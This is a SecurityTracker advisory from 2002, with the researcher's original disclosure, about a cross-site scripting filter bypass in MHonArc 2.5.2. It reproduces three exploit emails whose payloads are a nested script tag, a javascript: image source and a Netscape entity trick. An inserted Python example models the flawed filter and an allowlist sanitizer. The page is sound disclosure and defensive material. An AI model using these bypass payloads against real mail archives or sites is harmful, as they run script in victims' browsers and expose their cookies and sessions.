SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   MHonArc
Vendors:   Hood, Earl
MHonArc Mail-to-HTML Converter Input Filtering Mechanisms Can Be Bypassed, Allowing Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1004107
SecurityTracker URL:  http://securitytracker.com/id/1004107
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 19 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 2.5.2
Description:   An input validation vulnerability was reported in MHonArc, a Perl-based mail-to-HTML converter. A remote user can bypass input filtering mechanisms and conduct cross-site scripting attacks against MHonArc users.

It is reported that MHonArc filters out scripting tags from user supplied mail messages. However, a remote user can apparently create e-mail content that will bypass the filtering mechanism.

For example, the following type of text will be partially filtered, yielding valid scripting code in the resulting HTML:

<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>

Javascript can also be placed within an image tag, as shown:

<IMG SRC=javascript:alert(document.domain)>

Finally, the following code will allow javascript to bypass the filter, but is only effective if Netscape 4.x is used by the target (victim) user.

<B foo=&{alert(document.domain)};>
</B>

In all of these cases, a remote user could submit an e-mail message that, when converted by MHonArc and viewed by a target (victim) user, will cause arbitrary Javascript to be executed by the target user's browser. The code will originate from the MHonArc site and will run in the security context of that site. As a result, the code can access the target user's cookies associated with that site (if any) and can take actions on behalf of the target user.
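An added illustration of the filtering flaw described above, written here and not taken from MHonArc: a single-pass deletion of script tags (an assumed model of the vulnerable filter, not the project's actual code) turns the nested payload into a valid script element; re-running the deletion to a fixed point closes only that trick and leaves the javascript: image source untouched; an allowlist rebuild that escapes everything it does not recognise neutralises all three payloads. The tag and attribute allowlists are assumptions chosen for the example.

```python
import re
from html import escape

# Constructed inputs: the three bypass payloads quoted in the advisory.
PAYLOAD_NESTED = "<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>"
PAYLOAD_IMG = "<IMG SRC=javascript:alert(document.domain)>"
PAYLOAD_ENTITY = "<B foo=&{alert(document.domain)};></B>"
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)

def naive_strip_script(doc):
    """Assumed model of the flawed filter: one pass that deletes <script> tags (not MHonArc's code)."""
    return SCRIPT_TAG.sub("", doc)

def strip_to_fixpoint(doc):
    """Re-run the deletion until nothing changes, so text joined by a deletion is re-checked."""
    while True:
        stripped = SCRIPT_TAG.sub("", doc)
        if stripped == doc:
            return doc
        doc = stripped

# Allowlist approach (assumed lists): keep only known tags and attributes, escape everything else.
ALLOWED = {"b": set(), "i": set(), "p": set(), "br": set(), "a": {"href"}, "img": {"src", "alt"}}
SAFE_URL = re.compile(r"^(https?://|mailto:|/|#)", re.IGNORECASE)
TAG = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>")
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)""")

def _rebuild_tag(m):
    closing, name, attrs = m.group(1), m.group(2).lower(), m.group(3)
    if name not in ALLOWED:
        return escape(m.group(0))          # unknown tag becomes inert text
    if closing:
        return f"</{name}>"
    kept = []
    for am in ATTR.finditer(attrs):
        key, value = am.group(1).lower(), am.group(2).strip("\"'").strip()
        if key not in ALLOWED[name]:
            continue                       # drops foo=&{...}; and any event handler
        if key in ("href", "src") and not SAFE_URL.match(value):
            continue                       # drops javascript: and any other unlisted scheme
        kept.append(f' {key}="{escape(value, quote=True)}"')
    return f"<{name}{''.join(kept)}>"

def allowlist_sanitize(doc):
    """Rebuild recognised tags and escape all text in between, so a stray '<' cannot form markup."""
    out, pos = [], 0
    for m in TAG.finditer(doc):
        out.append(escape(doc[pos:m.start()]))
        out.append(_rebuild_tag(m))
        pos = m.end()
    out.append(escape(doc[pos:]))
    return "".join(out)
```

The fixed-point variant shows why patching the blocklist is not enough on its own: it only addresses the nesting trick, whereas the allowlist rebuild rejects by construction whatever it was not told to keep.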

Impact:   A remote user can cause arbitrary javascript to be executed on a target (victim) user's browser. The code can access the user's cookies associated with the MHonArc site (if any) and can take actions on the MHonArc site on behalf of the user.
Solution:   The vendor has released a fixed version (2.5.3), as described at:

http://www.mhonarc.org/MHonArc/CHANGES

The new version is available at:

http://www.mhonarc.org/#availability

Vendor URL:  www.mhonarc.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based

Message History:   None.


 Source Message Contents

Subject:  MHonArc v2.5.2 Script Filtering Bypass Vulnerability


MHonArc v2.5.2 Script Filtering Bypass Vulnerability
====================================================

Affected:
---------
  MHonArc v2.5.2
  http://www.mhonarc.org/

Fixed:
------
  MHonArc v2.5.3
  http://www.mhonarc.org/MHonArc/CHANGES

Problem:
--------
  MHonArc has a feature which filters out scripting tags from incoming
  HTML mails and it is enabled by default.  However, some variations
  of scripting tags will not be filtered.

Exploit 1:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
  </HTML>
----------

Exploit 2:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <IMG SRC=javascript:alert(document.domain)>
  </HTML>
----------

Exploit 3:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <B foo=&{alert(document.domain)};>
  Vulnerable only if Netscape 4.x is used to browse.</B>
  </HTML>
----------

Vendor Status:
--------------
  The author was contacted on December 16, 2001.
  The fixed version was released on April 18, 2002.


Best regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://staff.aist.go.jp/takagi.hiromitsu/


Copyright 2021, SecurityGlobal.net LLC